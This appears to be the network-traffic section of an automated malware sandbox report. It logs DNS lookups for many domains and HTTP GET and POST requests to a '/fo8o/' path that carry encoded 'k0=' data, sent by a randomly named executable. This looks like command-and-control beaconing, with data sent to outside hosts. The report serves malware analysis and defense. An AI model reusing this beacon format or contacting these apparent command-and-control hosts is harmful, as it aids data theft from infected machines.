                                                                                  Dec 7, 2024 07:00:56.563982964 CET5355253192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:00:57.270502090 CET53535521.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:01:11.899816990 CET5340053192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:01:12.153143883 CET53534001.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:01:20.229412079 CET6311353192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:01:20.977943897 CET53631131.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:02:35.439585924 CET5115653192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:02:35.809851885 CET53511561.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:02:50.594393015 CET5425653192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:02:50.828432083 CET53542561.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:02:58.908297062 CET5708353192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:02:59.466309071 CET53570831.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:03:14.145320892 CET5908253192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:03:15.088314056 CET53590821.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:03:29.799896955 CET5529053192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:03:29.979104996 CET53552901.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:03:38.269126892 CET5702453192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:03:38.490912914 CET53570241.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:03:46.549257994 CET5066053192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:03:47.052993059 CET53506601.1.1.1192.168.2.5
                                                                                  Dec 7, 2024 07:04:01.393865108 CET5251253192.168.2.51.1.1.1
                                                                                  Dec 7, 2024 07:04:01.620595932 CET53525121.1.1.1192.168.2.5

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Dec 7, 2024 07:00:29.009788036 CET192.168.2.51.1.1.10xacStandard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:00:29.998707056 CET192.168.2.51.1.1.10xacStandard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:00:31.014116049 CET192.168.2.51.1.1.10xacStandard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:00:47.954760075 CET192.168.2.51.1.1.10xacbdStandard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:00:56.563982964 CET192.168.2.51.1.1.10xd487Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:01:11.899816990 CET192.168.2.51.1.1.10xe970Standard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:01:20.229412079 CET192.168.2.51.1.1.10x494eStandard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:02:35.439585924 CET192.168.2.51.1.1.10x777aStandard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:02:50.594393015 CET192.168.2.51.1.1.10x583fStandard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:02:58.908297062 CET192.168.2.51.1.1.10x84a2Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:03:14.145320892 CET192.168.2.51.1.1.10xf132Standard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:03:29.799896955 CET192.168.2.51.1.1.10xf675Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:03:38.269126892 CET192.168.2.51.1.1.10x35b0Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:03:46.549257994 CET192.168.2.51.1.1.10x712aStandard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:04:01.393865108 CET192.168.2.51.1.1.10x76beStandard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Dec 7, 2024 07:00:31.281286955 CET1.1.1.1192.168.2.50xacNo error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:00:31.281318903 CET1.1.1.1192.168.2.50xacNo error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:00:31.281330109 CET1.1.1.1192.168.2.50xacNo error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:00:48.511384010 CET1.1.1.1192.168.2.50xacbdName error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:00:57.270502090 CET1.1.1.1192.168.2.50xd487No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:01:12.153143883 CET1.1.1.1192.168.2.50xe970Name error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:01:20.977943897 CET1.1.1.1192.168.2.50x494eNo error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 7, 2024 07:01:20.977943897 CET1.1.1.1192.168.2.50x494eNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 7, 2024 07:01:20.977943897 CET1.1.1.1192.168.2.50x494eNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:02:35.809851885 CET1.1.1.1192.168.2.50x777aNo error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:02:50.828432083 CET1.1.1.1192.168.2.50x583fName error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:02:59.466309071 CET1.1.1.1192.168.2.50x84a2No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:03:15.088314056 CET1.1.1.1192.168.2.50xf132No error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 7, 2024 07:03:15.088314056 CET1.1.1.1192.168.2.50xf132No error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:03:29.979104996 CET1.1.1.1192.168.2.50xf675Name error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:03:38.490912914 CET1.1.1.1192.168.2.50x35b0Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:03:47.052993059 CET1.1.1.1192.168.2.50x712aNo error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 7, 2024 07:03:47.052993059 CET1.1.1.1192.168.2.50x712aNo error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                                  Dec 7, 2024 07:04:01.620595932 CET1.1.1.1192.168.2.50x76beName error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.3xfootball.com
                                                                                  • www.goldenjade-travel.com
                                                                                  • www.magmadokum.com
                                                                                  • www.rssnewscast.com
                                                                                  • www.techchains.info
                                                                                  • www.elettrosistemista.zip
                                                                                  • www.empowermedeco.com

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.549738154.215.72.110804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:00:31.411022902 CET520OUTGET /fo8o/?k0=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.3xfootball.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:00:32.905463934 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Sat, 07 Dec 2024 06:00:32 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.549796116.50.37.244804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:00:57.395142078 CET798OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d
                                                                                  Data Ascii: k0=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
                                                                                  Dec 7, 2024 07:00:58.910459995 CET492INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Sat, 07 Dec 2024 06:00:58 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.549806116.50.37.244804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:01:00.045208931 CET818OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 48 69 45 6d 77 72 59 70 37 6d 4c 31 38 6b 36 41 73 61 6a 77 35 2b 79 65 78 79 78 34 52 73 72 55 72 4f 70 64 44 34
                                                                                  Data Ascii: k0=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHiEmwrYp7mL18k6Asajw5+yexyx4RsrUrOpdD4
                                                                                  Dec 7, 2024 07:01:01.602883101 CET492INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Sat, 07 Dec 2024 06:01:00 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.549813116.50.37.244804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:01:02.700886011 CET1835OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 32 4e 5a 54 68 6e 6e 4c 6d 38 30 4d 2f 75 45 57 32 34 4a 38 33 59 2f 75 7a 5a 41 38 72 41 79 36 5a 78 35 31 77 37 47 6f 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 78 4e 46 47 67 41 5a 64 49 78 6b 61 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a 4a 78 [TRUNCATED]
                                                                                  Data Ascii: k0=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL2NZThnnLm80M/uEW24J83Y/uzZA8rAy6Zx51w7GoYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldxNFGgAZdIxkafgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB3wpOPRMSckz22D7oIJ1pT3kmt5OAzJQX0rpd4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7r8VUpMLRkY6c3P8G0fpnTUDkLQscQKtCpBC0WjC/PZq9AVPUPhBBD5/Dig7vxPgCc2pVcvipTzijVIvgKAdFC7i2pC8gbNWoNVRZMX415Goc9ACqxlKDTbGvtkaduGagDzKCszB0YP2v04KI092MQf7ousTmtftOjO7F0nipoP+ae415ShjaJt52G5Y6AFhRSUFLstJAda1ItR8M9j/L3g9nYAAaYrZcsa4vZMQvEH+ZAtHeztq24kQbanf5ovMXFmxG2hPDmBOxYxWsGXxwqxAE4UChtzmKyovtMK56OZLEgKSJviIqU3z0dUvGszLNpCkWZsAqG3JpcHhuqqwQv6sb+TG8VHQhAkXO4dCk+vc59h2hhsQCETtYQj2hDGYgZtAbx5kvk5+K7Gl1SaKXYmnS6DbpM5fRwWGzllkVCSq+ddNwmCqpgcn42aU+9x/xCJsUgMK3AP/fEJ4db0U1RRo7K/TxrU/5+U+u6hHJplkdFUrMBIcY0SOK4eWxpJ3wpdR7JATPJiykjxVFixp [TRUNCATED]
                                                                                  Dec 7, 2024 07:01:04.278106928 CET492INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Sat, 07 Dec 2024 06:01:03 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.549819116.50.37.244804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:01:05.359543085 CET527OUTGET /fo8o/?k0=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.goldenjade-travel.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:01:06.875571012 CET492INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                  Date: Sat, 07 Dec 2024 06:01:06 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 315
